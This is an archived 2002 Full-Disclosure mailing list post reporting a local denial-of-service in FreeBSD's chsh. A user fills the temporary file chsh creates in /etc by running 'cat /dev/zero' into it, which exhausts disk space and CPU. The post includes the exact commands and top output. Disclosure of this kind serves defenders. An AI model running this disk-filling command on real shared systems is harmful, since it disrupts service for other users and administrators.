| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <20020815190038.GC416@bokeoa.com> From: core at bokeoa.com (Charles Stevenson) Subject: FBSD chsh DoS I found an interesting couple of related DoS to do against chsh on FBSD. Basically chsh creates a temporary file in /etc and then launches a user defined EDITOR. Anyways I couldn't find a way to exploit it but I did find a way to be annoying. tty1$ chsh even if you just launch vi you can get the name of the temporary file it created in /etc or just do ls. > ls -l /etc/pw.a1MwaM -rw------- 1 core core 330088448 Aug 15 01:44 /etc/pw.a1MwaM Er that's after I was being annoying hehehe... filled 60G on phased machine. Sorry phased! :D tty2$ cat /dev/zero > /etc/pw.a1MwaM Then go back to your vi session in chsh and :wq!... The results are that basically root can't even remove the file while it's being written to and of course lots of cpu overload abounds. Anyways quotas will stop this but how many admins put user quotas on filesystems that users aren't supposed to be writing to? PID USERNAME PRI NICE SIZE RES STATE TIME WCPU CPU COMMAND 14139 core 55 0 1140K 612K RUN 12:55 90.23% 90.23% chsh 14171 core 30 0 1912K 976K RUN 0:01 7.81% 2.83% top 13083 root 2 0 356K 0K nfsd 3:00 0.00% 0.00% nfsd peace, core -- Charles Stevenson (core) <core@...eoa.com> Lab Assistant, College of Eastern Utah San Juan Campus http://www.bokeoa.com/~core/core.asc -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20020815/2137ec96/attachment.bin
Powered by blists - more mailing lists